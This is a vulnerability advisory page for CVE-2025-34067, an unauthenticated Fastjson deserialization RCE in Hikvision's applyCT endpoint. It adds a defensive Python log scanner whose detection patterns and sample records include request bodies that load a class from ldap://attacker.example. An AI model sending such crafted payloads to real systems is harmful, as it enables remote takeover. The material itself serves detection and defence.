CVE-2025-34067
Published: 02 July 2025
Summary
CVE-2025-34067 is a critical-severity Deserialization of Untrusted Data (CWE-502) vulnerability in S4E (inferred from references). Its CVSS base score is 10.0 (Critical).
Operationally, it ranks in the top 7.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
CVE-2025-34067 is an unauthenticated remote code execution flaw in the applyCT component of the Hikvision Integrated Security Management Platform. The vulnerability stems from the component's use of a vulnerable Fastjson library version; the endpoint /bic/ssoService/v1/applyCT accepts and deserializes untrusted user input, enabling Fastjson's auto-type feature to load arbitrary Java classes referenced through an LDAP URL.
An attacker with network access can send a crafted request to the endpoint that triggers class loading and achieves arbitrary command execution on the underlying system. No authentication or user interaction is required, and the CVSS 4.0 score of 10.0 reflects the full impact across confidentiality, integrity, and availability.
Exploitation evidence was recorded by the Shadowserver Foundation on 2025-02-05 UTC. The EPSS score has remained flat at a peak of 0.0842 with no material increase since disclosure. Public references, including detailed write-ups on GitHub and advisories from VulnCheck and S4E, document the issue but do not specify vendor patches or configuration mitigations in the available sources.
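As an added defender-side example (not code from this advisory or its references), the following Python flags requests to the applyCT endpoint whose body carries Fastjson's `@type` auto-type key together with an LDAP/RMI class-loading URL, which is the pattern described above. The JSON log format, the sample records, the hosts and the class name are constructed assumptions.

```python
"""Detection helper for Fastjson auto-type requests against the applyCT
endpoint (CVE-2025-34067). Log format and sample records are constructed."""
import json
import re
from typing import Iterable, List, Optional

APPLYCT_PATH = "/bic/ssoService/v1/applyCT"              # endpoint named in the advisory
AUTOTYPE_KEY = re.compile(r'"@type"\s*:', re.I)           # Fastjson auto-type marker
JNDI_URL = re.compile(r"\b(ldaps?|rmi)://[^\s\"']+", re.I)  # remote class-loading URL


def inspect_request(path: str, body: str) -> Optional[dict]:
    """Return a finding for a request that matches the auto-type pattern
    on the applyCT endpoint, or None when the request looks benign."""
    if not path.startswith(APPLYCT_PATH):
        return None
    has_autotype = bool(AUTOTYPE_KEY.search(body))
    url = JNDI_URL.search(body)
    if has_autotype and url:           # auto-type plus remote loader URL: critical
        return {"path": path, "severity": "critical", "jndi_url": url.group(0)}
    if has_autotype:                   # auto-type key alone: worth a look
        return {"path": path, "severity": "medium", "jndi_url": None}
    return None


def scan_log(lines: Iterable[str]) -> List[dict]:
    """Each line is one JSON object with 'src', 'path' and 'body' keys
    (constructed format for this example); malformed lines are skipped."""
    findings = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = inspect_request(rec.get("path", ""), rec.get("body", ""))
        if finding:
            finding["src"] = rec.get("src")
            findings.append(finding)
    return findings


SAMPLE_RECORDS = [  # constructed sample traffic, not real captures
    {"src": "10.0.0.5", "path": APPLYCT_PATH,
     "body": '{"ticket":"abc123","username":"operator"}'},
    {"src": "198.51.100.7", "path": APPLYCT_PATH,
     "body": '{"@type":"EXAMPLE.PlaceholderClass","ref":"ldap://attacker.example/x"}'},
    {"src": "198.51.100.9", "path": "/bic/other",
     "body": '{"ref":"ldap://attacker.example/y"}'},
    {"src": "203.0.113.4", "path": APPLYCT_PATH,
     "body": '{"@type":"EXAMPLE.PlaceholderClass","x":1}'},
]
SAMPLE_LOG = [json.dumps(r) for r in SAMPLE_RECORDS]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Only the two applyCT requests carrying `@type` are reported; the LDAP URL sent to an unrelated path is ignored, so the rule stays tied to the vulnerable endpoint.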
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-19719
Vulnerability details
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Penetration testing supplies malicious serialized objects, detecting unsafe deserialization and supporting corrective actions.
- Evaluation of untrusted data handling (deserialization testing) reveals unsafe processing, which the required remediation process addresses.
- Untrusted serialized data can be deserialized and observed inside a sandbox, preventing gadget-chain exploitation from reaching the host outside it.
- Validates or rejects untrusted serialized data before deserialization occurs.
- Identifies and blocks malicious code introduced through deserialization of untrusted data at system boundaries.
- Integrity verification of serialized information can detect tampering before deserialization occurs.
- Provenance of associated data allows detection of untrusted sources before deserialization or processing occurs.